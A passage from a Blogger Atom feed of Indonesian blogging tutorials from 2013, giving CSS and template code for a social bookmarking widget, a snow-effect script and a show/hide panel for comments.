href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/cara-memasang-widget-sharing-is-sexy.html&quot; target=&quot;_blank&quot; title=&quot;apa itu social bookmarking&quot;&gt;social bookmarking&lt;/a&gt;
 yang disediakan untuk memberi kemudahan bagi pemilik blog maupun 
pengunjung dalan mensubmit atau membookmark artikel yang ia sukai ke &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;situs&lt;/span&gt; social bookmarking hanya dengan mengklik pada icon-icon social bookmarking yang ada.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=8688056575447479178&quot;&gt;&lt;img alt=&quot;sharing is sexy: auto hiding social bookmarking widget&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5520759822905109042&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFt3u7zgKtWe35UV8Ilp00D3HosC4SLqOQkuWWkub2l1oq5ukma0H3GnX1PkcK-WQn0OmXr8omUH9Dxlwaehs2jhRcsG_bNNWjWUt2_QBFziRdou_UmssdrOln7bulr_vI9vPNgz0U8PTT/s400/sharing-is-sexy-widget.gif&quot; style=&quot;display: block; height: 54px; margin: 0px auto 10px; text-align: center; width: 400px;&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
Keunikan dari widget sharing is sexy adalah icon-icon social bookmarking
 yang terdapat didalamnya bisa bergerak ketika disorot mouse sehingga 
terlihat lebih hidup dan menarik.&lt;span id=&quot;fullpost&quot;&gt;&lt;br /&gt;&lt;br /&gt;Bagi anda yang tertarik, silahkan ikuti langkah-langkah dibawah ini:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h4 style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; text-align: justify;&quot;&gt;
&lt;span style=&quot;color: #cc0000;&quot;&gt;Cara Memasang Widget Sharing is Caring/Sexy di Blogger&lt;/span&gt;&lt;/h4&gt;
&lt;div style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; text-align: justify;&quot;&gt;
Widget bookmark sharing blogger ini akan ditampilkan di bawah posting blog.&lt;br /&gt;
&lt;br /&gt;
1. Masuk ke dashboard &amp;gt; template &amp;gt; Edit HTML&lt;/div&gt;
&lt;div style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; text-align: justify;&quot;&gt;
2. Centang &#39;&lt;i&gt;Expand Widget Templates&lt;/i&gt;&#39;. Jika perlu, backup template terlebih dahulu.&lt;/div&gt;
&lt;div style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; text-align: justify;&quot;&gt;
3. Cari &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;lt;/head&amp;gt;&lt;/b&gt;&lt;/span&gt; (Ctrl+F), letakkan kode CSS berikut tepat di atasnya.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;&quot;&gt;
&amp;lt;!--&lt;span style=&quot;color: #000035;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;u&gt;&lt;b&gt;abrian-pamungkaz&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;.blogspot.com-starts--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;style type=&#39;text/css&#39;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
div.beauty-bookmarks 
{height:54px;background:url(&amp;amp;#39;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_7fh_k6uSVzHd487c6eNFmstqEeuivYCZOC_bbQlwGMeC3e5Cf8XGRHoAVmskOczDYOy5-31uwnwq1fK2vw5IlZft4SdbNJoFcLzbn41oM45h4Mn8gKjlgZ3bG91omvObz8rnnB5E7zkY/s1600/buka-rahasia-sharing-background.png&amp;amp;#39;)

 no-repeat &lt;span style=&quot;color: blue;&quot;&gt;left top&lt;/span&gt;;position:relative;width:540px;}&lt;br /&gt;
&lt;br /&gt;
div.beauty-bookmarks span.beauty-rightside 
{width:17px;height:54px;background:url(&amp;amp;#39;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_7fh_k6uSVzHd487c6eNFmstqEeuivYCZOC_bbQlwGMeC3e5Cf8XGRHoAVmskOczDYOy5-31uwnwq1fK2vw5IlZft4SdbNJoFcLzbn41oM45h4Mn8gKjlgZ3bG91omvObz8rnnB5E7zkY/s1600/buka-rahasia-sharing-background.png&amp;amp;#39;)

 no-repeat &lt;span style=&quot;color: blue;&quot;&gt;right top&lt;/span&gt;;position:absolute;right:-17px;}&lt;br /&gt;
&lt;br /&gt;
div.beauty-bookmarks ul.socials {margin:0 !important;padding:0 !important;position:absolute;bottom:0;left:10px;}&lt;br /&gt;
&lt;br /&gt;
div.beauty-bookmarks ul.socials li {display:inline-block 
!important;float:left !important;list-style-type:none 
!important;margin:0 !important;height:29px !important;width:48px 
!important;cursor:pointer !important;padding:0 !important;}&lt;br /&gt;
&lt;br /&gt;
div.beauty-bookmarks ul.socials a {display:block !important;width:48px 
!important;height:29px !important;font-size:0 
!important;color:transparent !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-furl, .beauty-furl:hover, .beauty-digg, .beauty-digg:hover, 
.beauty-reddit, .beauty-reddit:hover, .beauty-stumble, 
.beauty-stumble:hover, .beauty-delicious, .beauty-delicious:hover, 
.beauty-yahoo, .beauty-yahoo:hover, .beauty-blinklist, 
.beauty-blinklist:hover, .beauty-technorati, .beauty-technorati:hover, 
.beauty-facebook, .beauty-facebook:hover, .beauty-twitter, 
.beauty-twitter:hover, .beauty-myspace, .beauty-myspace:hover, 
.beauty-mixx, .beauty-mixx:hover, .beauty-script-style, 
.beauty-script-style:hover, .beauty-designfloat, 
.beauty-designfloat:hover, .beauty-syndicate, .beauty-syndicate:hover, 
.beauty-email, .beauty-email:hover {&lt;br /&gt;
&lt;br /&gt;
background:url(&amp;amp;#39;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNsYqWjypBACxhGGC3_lwgsWhK5gMeL8v23jNwGqnvn51g8TQRV54zxAsyli1p0hoGF__TKWI2DxUhD5IUMdJ-f2mZzymGM0sLYklLHYGU0hzEAtUrgoeJ7CwARh3l64R9ioJMI3bbb7s/s1600/bukarahasia-sexysprite.png&amp;amp;#39;)

 no-repeat !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-furl {background-position:-300px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-furl:hover {background-position:-300px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-digg {background-position:-500px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-digg:hover {background-position:-500px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-reddit {background-position:-100px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-reddit:hover {background-position:-100px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-stumble {background-position:-50px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-stumble:hover {background-position:-50px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-delicious {background-position:left top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-delicious:hover {background-position:left bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-yahoo {background-position:-650px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-yahoo:hover {background-position:-650px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-blinklist {background-position:-600px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-blinklist:hover {background-position:-600px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-technorati {background-position:-700px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-technorati:hover {background-position:-700px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-myspace {background-position:-200px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-myspace:hover {background-position:-200px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-twitter {background-position:-350px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-twitter:hover {background-position:-350px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-facebook {background-position:-450px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-facebook:hover {background-position:-450px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-mixx {background-position:-250px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-mixx:hover {background-position:-250px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-script-style {background-position:-400px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-script-style:hover {background-position:-400px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-designfloat {background-position:-550px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-designfloat:hover {background-position:-550px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-syndicate {background-position:-150px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-syndicate:hover {background-position:-150px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-email {background-position:-753px top !important;}&lt;br /&gt;
&lt;br /&gt;
.beauty-email:hover {background-position:-753px bottom !important;}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/style&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--abrian-pamungkaz.blogspot.com-ends--&amp;gt;&amp;nbsp;&lt;/blockquote&gt;
&lt;div style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; text-align: justify;&quot;&gt;
&lt;i&gt;&lt;b&gt;Kostumisasi CSS:&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; text-align: justify;&quot;&gt;
Secara default, CSS di atas saya set untuk menampilkan quote &quot;&lt;i&gt;sharing is caring&lt;/i&gt;&quot;. Untuk mengubah menjadi &quot;&lt;i&gt;sharing is sexy&lt;/i&gt;&quot;, perhatikan pada bagian CSS background positioning di atas yang saya tandai dengan &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;warna biru&lt;/b&gt;&lt;/span&gt;: ganti &lt;span style=&quot;color: blue;&quot;&gt;left top&lt;/span&gt; dengan &lt;span style=&quot;color: red;&quot;&gt;left bottom&lt;/span&gt;, dan &lt;span style=&quot;color: blue;&quot;&gt;right top&lt;/span&gt; dengan &lt;span style=&quot;color: red;&quot;&gt;right bottom&lt;/span&gt;.&lt;/div&gt;
&lt;div style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; text-align: justify;&quot;&gt;
4. Cari &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;lt;data:post.body/&amp;gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;(Ctrl+F),&lt;/span&gt;&amp;nbsp;paste kode berikut &lt;b&gt;TEPAT&lt;/b&gt; setelah/dibawahnya:&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;&quot;&gt;
&amp;lt;!--abrian-pamungkaz.blogspot.com-starts--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b:if cond=&#39;data:blog.pageType == &amp;amp;quot;item&amp;amp;quot;&#39;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;div class=&#39;beauty-bookmarks&#39;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ul class=&#39;socials&#39;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-delicious&#39;&amp;gt;&amp;lt;a 
expr:href=&#39;&amp;amp;quot;http://del.icio.us/post?url=&amp;amp;quot; + 
data:post.url + &amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + data:post.title&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-digg&#39;&amp;gt;&amp;lt;a expr:href=&#39;&amp;amp;quot; 
http://digg.com/submit?url=&amp;amp;quot; + data:post.url + 
&amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + data:post.title&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-technorati&#39;&amp;gt;&amp;lt;a expr:href=&#39;&amp;amp;quot; 
http://technorati.com/faves?add=&amp;amp;quot; + data:post.url + 
&amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + data:post.title&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-reddit&#39;&amp;gt;&amp;lt;a expr:href=&#39;&amp;amp;quot; 
http://www.reddit.com/submit?url=&amp;amp;quot; + data:post.url + 
&amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + data:post.title&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-stumble&#39;&amp;gt;&amp;lt;a expr:href=&#39;&amp;amp;quot; 
http://www.stumbleupon.com/submit?url=&amp;amp;quot; + data:post.url + 
&amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + data:post.title&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-designfloat&#39;&amp;gt;&amp;lt;a 
expr:href=&#39;&amp;amp;quot;http://www.designfloat.com/submit.php?url=&amp;amp;quot;
 + data:post.url + &amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + 
data:post.title&#39; target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-facebook&#39;&amp;gt;&amp;lt;a expr:href=&#39;&amp;amp;quot; 
http://www.facebook.com/sharer.php?u=&amp;amp;quot; + data:post.url + 
&amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + data:post.title&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-twitter&#39;&amp;gt;&amp;lt;a 
expr:href=&#39;&amp;amp;quot;http://twitter.com/home/?status=Chk Out-&amp;amp;quot; +
 data:post.title + &amp;amp;quot; &amp;amp;quot; + data:post.url&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-furl&#39;&amp;gt;&amp;lt;a expr:href=&#39;&amp;amp;quot; 
http://www.furl.net/storeIt.jsp?u=&amp;amp;quot; + data:post.url + 
&amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + data:post.title&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-syndicate&#39;&amp;gt;&amp;lt;a href=&#39;&lt;a href=&quot;http://feeds.feedburner.com/CaptainKidsBlog&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;u&gt;&lt;b&gt;http://feeds.feedburner.com/CaptainKidsBlog&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;/span&gt;&#39; title=&#39;Subscribe to RSS&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;li class=&#39;beauty-email&#39;&amp;gt;&amp;lt;a expr:href=&#39;&amp;amp;quot; 
mailto:?subject=&amp;amp;quot; + data:post.url + 
&amp;amp;quot;&amp;amp;amp;title=&amp;amp;quot; + data:post.title&#39; 
target=&#39;_blank&#39;/&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span class=&#39;beauty-rightside&#39;/&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/b:if&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--abrian-pamungkaz.blogspot.com-ends--&amp;gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;&quot;&gt;
Ganti &lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;u&gt;&lt;b&gt;http://feeds.feedburner.com/CaptainKidsBlog&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;&quot;&gt; dengan url feedburner blogmu.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;&quot;&gt;5. Save templates.&lt;/span&gt;&lt;br /&gt;
&lt;span id=&quot;fullpost&quot;&gt;Demikian artikel tentang &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/cara-memasang-widget-sharing-is-sexy.html&quot;&gt;Membuat Widget Sharing is Sexy&lt;/a&gt; di 
bawah postingan blog, semoga bermanfaat, bila ada pertanyaan comment di 
bawah.
&lt;/span&gt;&lt;br /&gt;
&lt;span id=&quot;fullpost&quot;&gt;&amp;nbsp;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;captain-kid&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/7114917473946129908/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-memasang-widget-sharing-is-sexy.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/7114917473946129908'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/7114917473946129908'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/cara-memasang-widget-sharing-is-sexy.html' title='Cara Memasang Widget Sharing Is Sexy '/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFt3u7zgKtWe35UV8Ilp00D3HosC4SLqOQkuWWkub2l1oq5ukma0H3GnX1PkcK-WQn0OmXr8omUH9Dxlwaehs2jhRcsG_bNNWjWUt2_QBFziRdou_UmssdrOln7bulr_vI9vPNgz0U8PTT/s72-c/sharing-is-sexy-widget.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-7596034141859017863</id><published>2013-02-15T03:47:00.003-08:00</published><updated>2013-02-15T23:00:35.924-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Cara Membuat Efek Salju </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Kali ini saya akan menuliskan &lt;b&gt;tutorial&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/kali-ini-saya-akan-menuliskan-tutorial.html&quot;&gt;/cara membuat efek salju pada blog&lt;/a&gt; blogger&lt;/b&gt;, namun sebelum saya &lt;i&gt;cara membuat efek salju di blog&lt;/i&gt;
 mungkin kamu ingin melihat demo efek salju di blog yang sudah 
menggunakan script efek salju ini, agar kamu lebih yakin apakah script 
ini bekerja.&lt;br /&gt;
&lt;br /&gt;
Untuk melihat efek salju di blog secara langsung silakan klik &lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;http://taufik-blukutuk.blogspot.com/&quot;&gt;disini&lt;/a&gt;&lt;/span&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Bagaimana hasilnya?&lt;br /&gt;
Oke saya rasa tidak perlu panjang lebar, langsung saja ke topik utama, simak baik-baik ya.&lt;br /&gt;
&lt;div id=&quot;tab-posting&quot;&gt;
&lt;div class=&quot;post1&quot;&gt;
&lt;h3&gt;
Tutorial Cara Membuat Efek Salju Di Blog Untuk Blogger Baru&lt;/h3&gt;
1. Klik Tata Letak &lt;br /&gt;
2. Klik Tambah Gadget / Add A Gadget&lt;br /&gt;
3. Pilih Gadget Html/JavaScript&lt;br /&gt;
4. Masukkan kode Efek Salju di sini&lt;br /&gt;
5. Simpan. &lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;clear&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;color: red;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Kode Script Efek Salju&lt;/span&gt;&lt;/div&gt;
Inilah script efek salju yang harus dipasang pada widget blog kamu.&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;pre&gt;&amp;lt;script type=&quot;text/javascript&quot; src=&quot;http://ahmad-rifai-tools.googlecode.com/files/salju-blog.ahmadrifai.net.js&quot; /&amp;gt;&amp;lt;/script&amp;gt;&lt;/pre&gt;
&lt;/blockquote&gt;
Karena salju itu warnanya putih maka efek salju di atas warnanya adalah 
putih, dan ini hanya cocok untuk blogger yang menggunakan template 
dengan warna gelap, seperti hitam, dsb. (Pokoknya yang bisa menampilkan 
efek salju yang berwarna putih).&lt;br /&gt;
&lt;br /&gt;
Jika blog teman menggunakan template dengan warna putih, maka script efek salju yang harus digunakan adalah yang script efek
 salju alternatif, silakan gunakan script berikut.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;color: red;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Kode Script Efek Salju Alternatif&lt;/span&gt;&lt;/div&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;pre&gt;&amp;lt;script type=&quot;text/javascript&quot; src=&quot;http://ahmad-rifai-tools.googlecode.com/files/salju-blog.ahmadrifai.net.js&quot; /&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;script type=&quot;text/javascript&quot;&amp;gt;
&lt;div style=&quot;color: blue;&quot;&gt;
&lt;b&gt;snowStorm.snowColor = &#39;#99ccff&#39;; // salju biru muda (silakan ganti dengan warna lain)&lt;/b&gt;&lt;/div&gt;
snowStorm.flakesMaxActive = 96;
snowStorm.useTwinkleEffect = true;
&amp;lt;/script&amp;gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;b&gt;Semoga bermanfaat &lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;captain-kid&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt; &lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/7596034141859017863/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/kali-ini-saya-akan-menuliskan-tutorial.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/7596034141859017863'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/7596034141859017863'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/02/kali-ini-saya-akan-menuliskan-tutorial.html' title='Cara Membuat Efek Salju '/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-1247284091236171105</id><published>2013-02-15T03:45:00.001-08:00</published><updated>2013-02-23T23:15:14.021-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="tips-trick"/><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Cara membuat Show/Hide Pada Komentar Blog</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/02/cara-membuat-showhide-pada-komentar-blog.html&quot;&gt;&lt;u&gt;&lt;b&gt;Cara Membuat Show/Hide Pada Komentar Blog&lt;/b&gt;&lt;/u&gt;&lt;/a&gt;&amp;nbsp; Sering kita melihat &lt;u&gt;blog&lt;/u&gt; seseorang yang disitu terdapat arikel yang 
banyak sekali visitor/pengunjung yang berkomentar pada artikel tersebut.
 Nah, kali ini saya ingin berbagi tentang &lt;b&gt;Cara Membuat Menu Show/Hide Pada Komentar Blog&lt;/b&gt;
 yang berfungsi untuk menghemat tempat agar tidak telalu panjang dan 
tidak memperlambat loading saat membuka artikel yang dikarenakan 
banyaknya pengunjung yang berkomentar pada artikel tersebut.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;
&lt;b&gt;Ikuti cara-caranya di bawah ini:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1. Login ke blogger&lt;br /&gt;
2. Klik &lt;b&gt;Rancangan&lt;/b&gt; &amp;gt;&amp;gt;&lt;b&gt; Edit HTML&lt;/b&gt; &amp;gt;&amp;gt; centang &lt;b&gt;Expand Template Widget&lt;/b&gt;&lt;br /&gt;
3. Cari kode &lt;span style=&quot;color: red;&quot;&gt;]]&amp;gt;&amp;lt;/b:skin&amp;gt;&lt;/span&gt; jika sudah ketemu, Copy kode dibawah ini, Paste &lt;u&gt;di atas&lt;/u&gt; kode &lt;span style=&quot;color: red;&quot;&gt;]]&amp;gt;&amp;lt;/b:skin&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
a.openpanel {display:block;width:100%;height:40px;padding:0px 
0px;text-align:center;font-weight:bold;line-height:30px;background: 
url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4y9jlIkraPX5CrSteb8u1HnpgYZ0tYRS1SC9On97iHASZ5uvDmz0u6xU-kzUgIJw7Alstw5aNyP8rWRlxhEuEM-CDdiHT4ggOaq9k9Uq4ecrnNzuQftdRREdMuVCwvDs34fvjsNAOJE4J/s1600/topmenueva.jpg)repeat-x;-webkit-transition:
 all .15s ease-in-out;-webkit-transform-origin: 50% 
1px;position:relative;&lt;br /&gt;
}a.openpanel em 
{width:0px;height:0px;display:block;position:absolute;top:15px; 
right:15px;border:6px solid transparent;border-top-color:white;&lt;br /&gt;
}a.openpanel.active {background-color:#;}a.openpanel.active em {top:6px;border color:transparent transparent white transparent;&lt;br /&gt;
}div.paneline
 {height:0px;-webkit-transition: all .15s 
ease-in-out;-webkit-transform-origin: 50% 1px;}div.hompiPanel 
{padding:10px 20px 20px;margin:0px 0px !important;}&lt;/blockquote&gt;
4. Kemudian cari kode &lt;span style=&quot;color: red;&quot;&gt;&amp;lt;/head&amp;gt;&lt;/span&gt; jika sudah ketemu, copy dan paste kode di bawah ini sebelum &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;lt;/head&amp;gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&amp;lt;script type=&#39;text/javascript&#39;&amp;gt;&lt;br /&gt;
//&amp;lt;![CDATA[&lt;br /&gt;
var panelSelector&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = &#39;#comments&#39;,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; openPanelText&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = &quot;Buka Komentar&quot;,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; closePanelText&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = &quot;Tutup Komentar&quot;,&lt;br /&gt;
